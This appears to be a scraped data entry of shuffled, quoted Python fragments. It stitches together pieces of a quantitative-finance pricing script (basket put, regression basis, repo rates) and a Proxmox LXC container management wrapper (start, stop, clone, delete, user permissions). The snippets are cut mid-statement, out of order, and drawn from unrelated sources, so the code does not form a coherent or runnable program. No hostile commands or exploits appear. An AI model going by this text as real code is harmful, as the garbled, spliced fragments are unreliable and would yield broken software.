todo:: Moving the", "expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0]) * rate", "mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530])", "\"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 +", "delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik',", "0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters", "parameters sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order =", "5 num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518,", "i-7] return rec # Reference Solution reference_riskfree = False refererce_adjust = False Example", "= 1 + 5 + 1 + 5 def regression_variable(self, no_of_samples, derivative, delta,", "Solution reference_riskfree = False refererce_adjust = False # Under development class GeometicBasketPut(): def", "(1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ -", "self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression =", "riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5,", "counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def", "* np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0] * np.einsum('i, ji, kj", "2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference Solution reference_riskfree = False", "* np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, 
dtype=float) self.mu_bar", "self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25", "self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate +", "np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0] * np.einsum('i, ji, kj ->", "= np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension)", "0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse =" ]
[ "iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = [] for", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str:", "for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for", "\"\"\" Get detailed status info about this container :return: Container info in JSON-like", "int]) -> None: \"\"\" Remove container by ID :param vmid: Container ID :return:", "int = None) -> str: \"\"\" Reboot container (safely) :param timeout: Number of", "should be an integer between 100 and 999999999\") if newid < 100 or", "in resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and", "\"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full else '0'} if newnode is", "shutdown failed (optional, default=True) :return: ID of task \"\"\" kwargs = {\"node\": self._node,", "def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self):", "= True) -> str: \"\"\" Clone LXC container :param newid: ID of new", "their roles :return: List of tuples of ProxmoxUser objects and string names of", "\"\"\" Get a list of users with permissions for this container and their", "containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api,", "role: String name of the role :return: None \"\"\" path = \"/vms/\" +", "__repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return", "None: \"\"\" Remove container by ID :param vmid: Container ID 
:return: None \"\"\"", "999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\":", "\"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container WARNING: doesn't", "ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp]", "and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser],", "container (get-only) \"\"\" return self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return: Node", "newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str = None, full:", "a container if shutdown failed (optional, default=True) :return: ID of task \"\"\" kwargs", "self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self,", "str: \"\"\" Reboot container (safely) :param timeout: Number of seconds to wait (optional)", "APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return", "config = self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1 def clone(self,", "ProxmoxNode] = None, name: str = None, full: bool = True) -> str:", "container should be an integer between 100 and 999999999\") newid = str(newid) kwargs", "= newnode.id kwargs[\"target\"] = newnode if name is not None: kwargs[\"hostname\"] = name", "path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role,", "node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont", "resp = self._api.list_containers(node) 
containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers", "bool: \"\"\" Whether container is currently running :return: True/False \"\"\" config = self.get_status_report()", "probably never works :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\":", "\"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI and probably never works", "api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys() def values(self):", "LXC (optional) :param full: Whether to make storage unlinked (note that linked might", "is not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if", "role: str) -> None: \"\"\" Add new permission for this container :param user:", "== 1 def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name:", "seconds to wait (optional) :param force_stop: Whether to stop a container if shutdown", "return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return: ID of", "doesn't appear in Proxmox GUI and probably never works :return: ID of task", "never works :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid}", "None) -> str: \"\"\" Reboot container (safely) :param timeout: Number of seconds to", "-> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with permissions for this", "permission for this container :param user: User ID or ProxmoxUser object :param role:", "def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid:", "this container for all users with any role :return: None \"\"\" for user,", "items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove", "\"vmid\": self._vmid} return 
self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely) :return:", "= {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\"", "newnode if name is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self)", "vmid: Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self):", "\"\"\" Resume container WARNING: doesn't appear in Proxmox GUI and probably never works", ":param newnode: New node ID or ProxmoxNode object (optional) :param name: Name of", "of seconds to wait (optional) :param force_stop: Whether to stop a container if", "str]]: \"\"\" Get a list of users with permissions for this container and", "(optional) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if", "= {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop", ":param timeout: Number of seconds to wait (optional) :param force_stop: Whether to stop", "self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys():", "== \"running\" def is_template(self) -> bool: \"\"\" Whether this container is a template", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs)", "permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return", "works :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return", "__init__(self, api: APIWrapper, vmid: str, node: str): self._api = api self._vmid = vmid", "str): self._api = api self._vmid = vmid self._node = 
node @property def id(self)", "int], newnode: Union[str, ProxmoxNode] = None, name: str = None, full: bool =", "int(newid) except ValueError: raise ValueError(\"ID of container should be an integer between 100", "container if shutdown failed (optional, default=True) :return: ID of task \"\"\" kwargs =", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) ->", "el[\"roleid\"]) for el in resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1]", "+= [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id: cont for", "propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove permission", "str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int])", ":return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str:", "wait (optional) :param force_stop: Whether to stop a container if shutdown failed (optional,", "\"\"\" Whether this container is a template :return: True/False \"\"\" config = self.get_config()", "None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container", "ProxmoxUser], role: str) -> None: \"\"\" Add new permission for this container :param", "typing import Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper,", "if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name is not", "ProxmoxUser object :param role: String name of the role :return: None \"\"\" path", "currently running :return: True/False \"\"\" config = self.get_status_report() return \"status\" in config.keys() and", "def clone(self, newid: Union[str, int], newnode: 
Union[str, ProxmoxNode] = None, name: str =", "resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"]", "raise ValueError(\"ID of container should be an integer between 100 and 999999999\") if", "self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int])", "all permissions for this container for all users with any role :return: None", "to wait (optional) :param force_stop: Whether to stop a container if shutdown failed", "\"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status", "full: Whether to make storage unlinked (note that linked might not be supported)", "template :return: True/False \"\"\" config = self.get_config() return \"template\" in config.keys() and config[\"template\"]", "str = None, full: bool = True) -> str: \"\"\" Clone LXC container", "el in resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\"", "str: \"\"\" :return: Unique ID of container (get-only) \"\"\" return self._vmid @property def", "force_stop else '0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs)", "self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID of task", "containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id: cont", "Stop container (unsafely) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\":", "info about this container :return: Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node,", "and string names of roles \"\"\" path = \"/vms/\" + self._vmid resp =", "api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers()", 
"not be supported) (optional, default=True) :return: ID of cloning task \"\"\" try: newid", "\"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return: ID", "from .nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict,", "get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info about this container :return:", "-> str: \"\"\" Shutdown container (safely) :param timeout: Number of seconds to wait", "ID or ProxmoxUser object :param role: String name of the role :return: None", "def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'):", "ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\"", "resume(self) -> str: \"\"\" Resume container WARNING: doesn't appear in Proxmox GUI and", "users with permissions for this container and their roles :return: List of tuples", "if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) ->", "is currently running :return: True/False \"\"\" config = self.get_status_report() return \"status\" in config.keys()", ":return: ID of cloning task \"\"\" try: newid = int(newid) except ValueError: raise", "self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container is currently running :return:", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1'", "Whether this container is a template :return: True/False \"\"\" config = self.get_config() return", "return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int]) ->", "Union[str, ProxmoxNode] = None, name: str = None, full: bool = True) ->", "1 def 
clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str", "in Proxmox GUI and probably never works :return: ID of task \"\"\" kwargs", "user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\"", "999_999_999: raise ValueError(\"ID of container should be an integer between 100 and 999999999\")", "(optional) :param full: Whether to make storage unlinked (note that linked might not", "JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container", "-> str: \"\"\" Reboot container (safely) :param timeout: Number of seconds to wait", "None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name is", "def remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove container by ID :param", "self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}:", "config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\" Whether this container is a", "newid < 100 or newid > 999_999_999: raise ValueError(\"ID of container should be", "class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node: str): self._api = api", "\"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config", "(optional, default=True) :return: ID of cloning task \"\"\" try: newid = int(newid) except", "ValueError: raise ValueError(\"ID of container should be an integer between 100 and 999999999\")", "ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {}", "container is a template :return: True/False \"\"\" config = 
self.get_config() return \"template\" in", "if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout:", "def running(self) -> bool: \"\"\" Whether container is currently running :return: True/False \"\"\"", "newnode: New node ID or ProxmoxNode object (optional) :param name: Name of new", "task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return:", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def", "+ \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None:", "__getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def", "make storage unlinked (note that linked might not be supported) (optional, default=True) :return:", "= str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't", "users with any role :return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user,", "return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container :return: ID of", "Any]: \"\"\" Get detailed status info about this container :return: Container info in", "__eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict:", "self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer:", "Suspend container WARNING: doesn't appear in Proxmox GUI and probably never works :return:", "or newid > 999_999_999: raise ValueError(\"ID of container should be an integer between", "container is currently running :return: True/False \"\"\" config = 
self.get_status_report() return \"status\" in", "self._containers.items() def remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove container by ID", "timeout: int = None, force_stop: bool = True) -> str: \"\"\" Shutdown container", "\"\"\" Remove permission for this container :param user: User ID or ProxmoxUser object", "if shutdown failed (optional, default=True) :return: ID of task \"\"\" kwargs = {\"node\":", "name: Name of new LXC (optional) :param full: Whether to make storage unlinked", "def reboot(self, timeout: int = None) -> str: \"\"\" Reboot container (safely) :param", "Whether to make storage unlinked (note that linked might not be supported) (optional,", "\"\"\" :return: Unique ID of container (get-only) \"\"\" return self._vmid @property def node(self)", "timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int", "resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if el[\"path\"]", "return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = []", "object :param role: String name of the role :return: None \"\"\" path =", "to make storage unlinked (note that linked might not be supported) (optional, default=True)", "__len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key =", "str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return", ".nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict, List,", "@property def node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers is located", "container should be an integer 
between 100 and 999999999\") if newid < 100", "config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode]", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs)", "user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) ->", "self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout is not", "Delete this container :return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def", "ProxmoxUser from typing import Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self,", "of new LXC (optional) :param full: Whether to make storage unlinked (note that", "objects and string names of roles \"\"\" path = \"/vms/\" + self._vmid resp", "new LXC (optional) :param full: Whether to make storage unlinked (note that linked", "in config.keys() and config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\" Whether this", "remove_all_permissions(self) -> None: \"\"\" Remove all permissions for this container for all users", "roles :return: List of tuples of ProxmoxUser objects and string names of roles", "= newnode if name is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def", "Dict[str, Any]: \"\"\" Get detailed status info about this container :return: Container info", "return self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers", "None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this", "newnode = newnode.id kwargs[\"target\"] = newnode if name is not None: kwargs[\"hostname\"] =", "self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container 
WARNING:", ":return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers)", "ProxmoxNode: \"\"\" :return: Node on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api,", "self._vmid, \"full\": '1' if full else '0'} if newnode is not None: if", "el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\"", "isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def", "(optional) :param name: Name of new LXC (optional) :param full: Whether to make", "any role :return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission) def", "def stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID of task \"\"\"", "of ProxmoxUser objects and string names of roles \"\"\" path = \"/vms/\" +", "JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get", "self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if el[\"path\"] and el[\"type\"]", "self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container :return: ID of deleting", "\"\"\" Start container :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\":", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self)", "roles \"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]),", "= name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container :return:", "self._node, \"vmid\": self._vmid, \"full\": '1' if full 
else '0'} if newnode is not", "Get detailed status info about this container :return: Container info in JSON-like format", "def suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI", "'0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self,", "from .users import ProxmoxUser from typing import Dict, List, Tuple, Any, Union class", "def id(self) -> str: \"\"\" :return: Unique ID of container (get-only) \"\"\" return", "True) -> str: \"\"\" Shutdown container (safely) :param timeout: Number of seconds to", "kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if", "self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of", "self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys()", "ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node: str): self._api = api self._vmid", "Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool:", "-> str: \"\"\" Start container :return: ID of task \"\"\" kwargs = {\"node\":", "ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def", "def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers()", "def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info about this container", "return \"template\" in config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str, int],", "names of roles \"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return", 
"task \"\"\" try: newid = int(newid) except ValueError: raise ValueError(\"ID of container should", "user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user:", "node) for cont in resp] self._containers = {cont.id: cont for cont in containers}", "= self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1 def clone(self, newid:", "\"vmid\": self._vmid, \"full\": '1' if full else '0'} if newnode is not None:", "-> str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI and probably", "\"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool =", "def delete(self) -> str: \"\"\" Delete this container :return: ID of deleting task", "return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info", "between 100 and 999999999\") if newid < 100 or newid > 999_999_999: raise", "on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) ->", "vmid self._node = node @property def id(self) -> str: \"\"\" :return: Unique ID", "= int(newid) except ValueError: raise ValueError(\"ID of container should be an integer between", "import Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid:", "running(self) -> bool: \"\"\" Whether container is currently running :return: True/False \"\"\" config", "return self._containers.items() def remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove container by", ":param force_stop: Whether to stop a container if shutdown failed (optional, default=True) :return:", "self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role:", "self._api.list_containers(node) 
containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id:", "Clone LXC container :param newid: ID of new LXC (integer number 100-999999999) :param", "of cloning task \"\"\" try: newid = int(newid) except ValueError: raise ValueError(\"ID of", "-> Dict[str, Any]: \"\"\" Get detailed config :return: Container config in JSON-like format", "user: User ID or ProxmoxUser object :param role: String name of the role", "in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\"", "\"\"\" Shutdown container (safely) :param timeout: Number of seconds to wait (optional) :param", "== \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self, user:", "all users with any role :return: None \"\"\" for user, permission in self.view_permissions():", "vmid: str, node: str): self._api = api self._vmid = vmid self._node = node", "{\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get", "\"\"\" config = self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1 def", "with any role :return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission)", "self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info about this", "str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't appear", "(optional) :param force_stop: Whether to stop a container if shutdown failed (optional, default=True)", "role :return: None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user", "= {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None,", 
"ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self)", "str: \"\"\" Stop container (unsafely) :return: ID of task \"\"\" kwargs = {\"node\":", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout:", "{\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container", "def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with permissions", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def", "\"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self,", "string names of roles \"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list()", "of new LXC (integer number 100-999999999) :param newnode: New node ID or ProxmoxNode", "\"\"\" Whether container is currently running :return: True/False \"\"\" config = self.get_status_report() return", "WARNING: doesn't appear in Proxmox GUI and probably never works :return: ID of", ":param role: String name of the role :return: None \"\"\" path = \"/vms/\"", "Union[str, int]) -> None: \"\"\" Remove container by ID :param vmid: Container ID", "vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return: ID of task \"\"\"", "with permissions for this container and their roles :return: List of tuples of", "kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]:", "Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers()", 
"\"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout is not None:", "kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\"", "ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return", "Number of seconds to wait (optional) :return: ID of task \"\"\" kwargs =", "= str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str,", ":return: Unique ID of container (get-only) \"\"\" return self._vmid @property def node(self) ->", "return \"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\"", "is_template(self) -> bool: \"\"\" Whether this container is a template :return: True/False \"\"\"", "and 999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid,", "delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove", "an integer between 100 and 999999999\") newid = str(newid) 